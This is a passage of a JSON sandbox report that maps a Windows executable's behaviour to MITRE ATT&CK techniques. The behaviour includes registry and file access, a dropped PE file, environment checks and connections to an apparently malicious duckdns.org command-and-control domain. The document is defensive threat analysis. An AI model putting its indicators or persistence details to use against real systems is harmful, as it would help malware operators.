"\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" reads file \"c:\\programdata\\install\\ing.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\\ASSEMBLYSTORAGEROOTS\"; Key: \"\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to touch file \"C:\\WINMM.dll\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to touch file \"C:\\Windows\\system32\\WINMM.dll\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to touch file \"C:\\version.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to touch file \"C:\\aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe.Local\\\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to touch file \"C:\\shcore.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to touch file \"C:\\Windows\\system32\\shcore.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to touch file \"C:\\Windows\\system\\shcore.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to touch file \"C:\\Windows\\shcore.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to touch file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to touch file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to touch file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to access non-existent file \"C:\\aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe.Local\\\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to access non-existent file \"C:\\ProgramData\\Install\\Ing.dat\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to access non-existent file \"\\Device\\RasAcd\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to access non-existent file \"C:\\AAB1B194E5EAFD81A0DDE59E29E57099AD8BC7DE6532E68A451A7B381A60C7D5.EXE.LOCAL\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" trying to access non-existent file \"C:\\ProgramData\\Install\\ING.DAT\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" writes file \"c:\\programdata\\install\\ing.dat\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" writes file \"%allusersprofile%\\install\\ing.dat\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"dism.log\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (312) with CRLF line terminators\"- [targetUID: 00000000-00006040]\n \"DISMHOST.EXE.67A9CC1C.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00006040]\n \"Ing.dat\" has type \"data\"- Location: [%ALLUSERSPROFILE%\\Install\\Ing.dat]- [targetUID: 00000000-00006040]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"AAB1B194E5EAFD81A0DDE59E29E57099AD8BC7DE6532E68A451A7B381A60C7D5\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\"; Key: \"PRODUCTNAME\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\111QQQ222WWW333EEE-UOHX34\"; Key: \"OKMODE\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\111QQQ222WWW333EEE-UOHX34\"; Key: \"DEL\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\111QQQ222WWW333EEE-UOHX34\"; Key: \"TIME\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\111QQQ222WWW333EEE-UOHX34\"; Key: \"UID\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"IsWow64Process\" with parameter \"6040\" - (UID: 00000000-00006040)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006040)\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006040)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"GetForegroundWindow\" (UID: 00000000-00006040)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006040)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-52", "type": 7, "relevance": 1, "name": "Contacts Dynamic DNS (possible C&C communication)", "description": "\"cam4r4sd3s3gur1d4.duckdns.org\"", "origin": "Network Traffic", "attck_id": "T1102", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "External Systems", "identifier": "suricata-0", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain\" (SID: 2022918, Rev: 5, Severity: 3) categorized as \"Misc activity\"", "origin": "Suricata Alerts"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "static-92", "relevance": 5, "name": "PE file has unusual entropy resources", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5\" has resource with unusual entropy \"RT_RCDATA:7.86329034058\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"DISMHOST.EXE.67A9CC1C.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00006040]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5\" has section name .text with entropy \"6.62609333856\"\n \"aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5\" has section name .reloc with entropy \"6.70990104745\"\n \"DISMHOST.EXE.67A9CC1C.bin\" has section name .text with entropy \"6.11476781338\"\n \"DISMHOST.EXE.67A9CC1C.bin\" has section name .data with entropy \"6.44580003198\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-6", "type": 7, "relevance": 5, "name": "Contacts random domain names", "description": "\"cam4r4sd3s3gur1d4.duckdns.org\" seems to be random", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-412", "type": 9, "relevance": 5, "name": "Spawned process connects to a network", "description": "Process \"C:\\aab1b194e5eafd81a0dde59e29e57099ad8bc7de6532e68a451a7b381a60c7d5.exe\" connects to <IPv4> on port 576 (TCP); Domain: \"cam4r4sd3s3gur1d4.duckdns.org\"", "origin": "Monitored Target", "attck_id": 